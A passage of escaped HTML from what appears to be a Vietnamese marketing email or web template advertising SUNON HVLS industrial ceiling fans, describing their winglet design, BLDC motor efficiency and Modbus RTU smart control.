0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371937464-2-05.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><strong>THI\\u1ebeT K\\u1ebe WINGLET \\u0110\\u01af\\u1ee2C C\\u1ea4P B\\u1eb0NG S\\u00c1NG CH\\u1ebe<\\/strong><br \\/>Thi\\u1ebft k\\u1ebf Winglet \\u0111\\u00e3 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf \\u0111\\u1ec3 gi\\u1ea3m s\\u1ee9c c\\u1ea3n v\\u00e0 ti\\u1ebfng \\u1ed3n c\\u1ee7a gi\\u00f3, \\u0111\\u1ed3ng th\\u1eddi \\u0111i\\u1ec1u ch\\u1ec9nh ch\\u1ea5t l\\u01b0\\u1ee3ng t\\u1eaft ti\\u1ebfng t\\u1ed1t nh\\u1ea5t d\\u1ef1a tr\\u00ean h\\u1ec7 th\\u1ed1ng m\\u00f4 ph\\u1ecfng \\u00e2m thanh c\\u1ee7a \\u0110\\u1ee9c, t\\u1eadn h\\u01b0\\u1edfng l\\u00e0n gi\\u00f3 trong l\\u00e0nh v\\u00e0 y\\u00ean t\\u0129nh.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681371949851-3-04.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"background-color: #ecf0f1;width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><strong>\\u0110\\u1ed8NG C\\u01a0 BLDC SI\\u00caU M\\u1eceNG<\\/strong><br \\/>Hi\\u1ec7u su\\u1ea5t h\\u01a1n 90% c\\u1ee7a \\u0111\\u1ed9ng c\\u01a1 BLDC l\\u00f5i. \\u0110\\u1ed9ng c\\u01a1 si\\u00eau m\\u1ecfng nh\\u1eb9, thi\\u1ebft k\\u1ebf \\u00edt ng\\u1ed9t ng\\u1ea1t h\\u01a1n.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:9px 33px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; color: #444444; line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 150%;\\\"><strong>Qu\\u1ea1t tr\\u1ea7n ch\\u1ea5t l\\u01b0\\u1ee3ng cao TAIWAN<\\/strong><br \\/>Qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng m\\u1ea1nh m\\u1ebd, th\\u1ed5i m\\u1ea1nh m\\u1ebd, ph\\u00f9 h\\u1ee3p \\u0111\\u1ec3 t\\u1ea3n nhi\\u1ec7t \\u0111\\u1ed1i l\\u01b0u trong kh\\u00f4ng gian r\\u1ed9ng, gi\\u00fap gi\\u1ea3m nhi\\u1ec7t \\u0111\\u1ed9 r\\u00f5 r\\u00e0ng m\\u1ed9t c\\u00e1ch hi\\u1ec7u qu\\u1ea3 v\\u00e0 t\\u1ea3n nhi\\u1ec7t \\u0111\\u1ec1u. V\\u1edbi vi\\u1ec7c s\\u1eed d\\u1ee5ng \\u0111\\u1ed9ng c\\u01a1 truy\\u1ec1n \\u0111\\u1ed9ng tr\\u1ef1c ti\\u1ebfp BLDC hi\\u1ec7u su\\u1ea5t cao, d\\u00f2ng qu\\u1ea1t c\\u00f4ng nghi\\u1ec7p m\\u1ea1nh m\\u1ebd c\\u1ee7a ch\\u00fang t\\u00f4i c\\u00f3 th\\u1ec3 ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng \\u0111\\u00e1ng k\\u1ec3 do s\\u1eed \\u0111\\u1ed9ng c\\u01a1 t\\u1eeb nam ch\\u00e2m do ch\\u00ednh SUNON thi\\u1ebft k\\u1ebf c\\u00f3 h\\u01a1n 40 n\\u0103m kinh nghi\\u1ec7m s\\u1ea3n xu\\u1ea5t v\\u00e0 nghi\\u00ean c\\u1ee9u. B\\u00ean c\\u1ea1nh \\u0111\\u00f3, d\\u00f2ng \\u0111\\u1ed9ng c\\u01a1 n\\u00e0y duy tr\\u00ec \\u0111\\u1ed9 b\\u1ec1n t\\u1ed1t m\\u00e0 kh\\u00f4ng c\\u1ea7n thay d\\u1ea7u th\\u01b0\\u1eddng xuy\\u00ean, cho ph\\u00e9p n\\u00f3 tr\\u1edf th\\u00e0nh s\\u1ef1 l\\u1ef1a ch\\u1ecdn hi\\u1ec7u qu\\u1ea3 nh\\u1ea5t v\\u1ec1 chi ph\\u00ed \\u0111\\u1ec3 \\u0111\\u1ea7u t\\u01b0 l\\u00e2u d\\u00e0i v\\u00e0o h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u h\\u00f2a kh\\u00f4ng kh\\u00ed th\\u01b0\\u01a1ng m\\u1ea1i.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681372080311-Powerful1-07.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #d8d0d0;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 33px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; color: #444444; line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 150%;\\\"><strong>T\\u1ed0I \\u01afU H\\u00d3A KH\\u00cd H\\u1eacU<\\/strong><br \\/>Kh\\u00e1c v\\u1edbi h\\u1ea7u h\\u1ebft c\\u00e1c qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn tr\\u00ean th\\u1ecb tr\\u01b0\\u1eddng d\\u1ef1a v\\u00e0o t\\u1ed1c \\u0111\\u1ed9 quay nhanh \\u0111\\u1ec3 t\\u1ea1o ra lu\\u1ed3ng kh\\u00f4ng kh\\u00ed kh\\u00f4ng \\u1ed5n \\u0111\\u1ecbnh v\\u00e0 kh\\u00f4ng \\u0111\\u1ed3ng \\u0111\\u1ec1u, Qu\\u1ea1t tr\\u1ea7n c\\u00f4ng nghi\\u1ec7p l\\u1edbn HVLS Fan series 1s\\u1eed d\\u1ee5ng kh\\u1ea3 n\\u0103ng \\u0111i\\u1ec1u khi\\u1ec3n \\u0111\\u1ed9ng c\\u01a1 v\\u01b0\\u1ee3t tr\\u1ed9i \\u0111\\u1ec3 t\\u1ea1o ra gi\\u00f3 \\u0111\\u1ec1u v\\u00e0 nh\\u1eb9.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167720431-Powerful3-12.jpeg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #ecf0f1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #ecf0f1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:18px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #d8d0d0;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:1px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: inherit; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><strong>\\u0110I\\u1ec0U KHI\\u1ec2N TH\\u00d4NG MINH<\\/strong><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">Ki\\u1ec3m so\\u00e1t t\\u1ed1t h\\u01a1n c\\u00e1c t\\u00ednh n\\u0103ng \\u0111i\\u1ec1u khi\\u1ec3n c\\u1ee7a qu\\u1ea1t SUNON. N\\u1ebfu b\\u1ea1n c\\u1ea7n m\\u1ee9c \\u0111\\u1ed9 qu\\u1ea3n l\\u00fd t\\u1eadp trung th\\u00f4ng qua Modbus - nh\\u01b0 l\\u00e0 m\\u1ed9t ph\\u01b0\\u01a1ng th\\u1ee9c qu\\u1ea3n l\\u00fd t\\u1eadp trung khi c\\u00f3 qu\\u00e1 nhi\\u1ec1u qu\\u1ea1t c\\u1ea7n qu\\u1ea3n l\\u00fd d\\u1ec5 d\\u00e0ng v\\u00e0 thu\\u1eadn ti\\u1ec7n. H\\u00e3y li\\u00ean h\\u1ec7 v\\u1edbi ch\\u00fang t\\u00f4i !<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">SUNON HVLS cung c\\u1ea5p gi\\u1ea3i ph\\u00e1p qu\\u1ea3n l\\u00fd Modbus th\\u00f4ng qua giao th\\u1ee9c chu\\u1ea9n c\\u00f4ng nghi\\u1ec7p RTU<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">Modbus RTU - \\u0111\\u00e2y l\\u00e0 m\\u1ed9t giao th\\u1ee9c \\u0111\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng r\\u1ed9ng r\\u00e3i trong nhi\\u1ec1u l\\u0129nh v\\u1ef1c nh\\u01b0 BMS (Building Management Systems), t\\u1ef1 \\u0111\\u1ed9ng h\\u00f3a, c\\u00f4ng nghi\\u1ec7p<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if 